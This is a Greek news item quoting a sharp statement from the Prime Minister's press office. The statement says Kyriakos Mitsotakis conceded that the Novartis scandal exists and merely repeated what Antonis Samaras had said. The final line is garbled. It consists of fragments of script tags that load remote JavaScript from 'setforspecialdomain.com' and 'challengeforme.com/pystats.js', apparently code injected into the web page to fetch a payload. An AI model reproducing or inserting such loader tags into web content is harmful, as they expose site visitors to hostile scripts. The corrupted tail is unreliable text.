Μαξίμου: Ο Μητσοτάκης ψελλίζει όσα είπε στην αρχηγική του τοποθέτηση ο Σαμαράς

Την ομιλία του προέδρου της ΝΔ σχολίασε το γραφείο τύπου του πρωθυπουργού, υποστηρίζοντας ότι ο Μητσοτάκης παραδέχθηκε ότι σκάνδαλο Novartis υπάρχει και επανέλαβε όσα προηγουμένως είχε πει στην παραληρηματική αλλά αρχηγική του τοποθέτηση ο πρώην πρωθυπουργός.

Με αιχμηρό τρόπο σχολίασε την ομιλία του Κυριάκου Μητσοτάκη στην κοινοβουλευτική ομάδα της ΝΔ το γραφείο τύπου του πρωθυπουργού.

“Ο κύριος Μητσοτάκης στην αμήχανη τοποθέτησή του στην ΚΟ της ΝΔ, αφού παραδέχθηκε πως σκάνδαλο Novartis υπάρχει, δεν κατάφερε παρά να ψελλίσει όσα προηγουμένως είχε πει ο κ. Σαμαράς στην παραληρηματική αλλά αρχηγική του τοποθέτηση”, αναφέρει σχετική ανακοίνωση και καταλήγει: “Του ευχόμαστε καλά ξεμπερδέματα.”

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>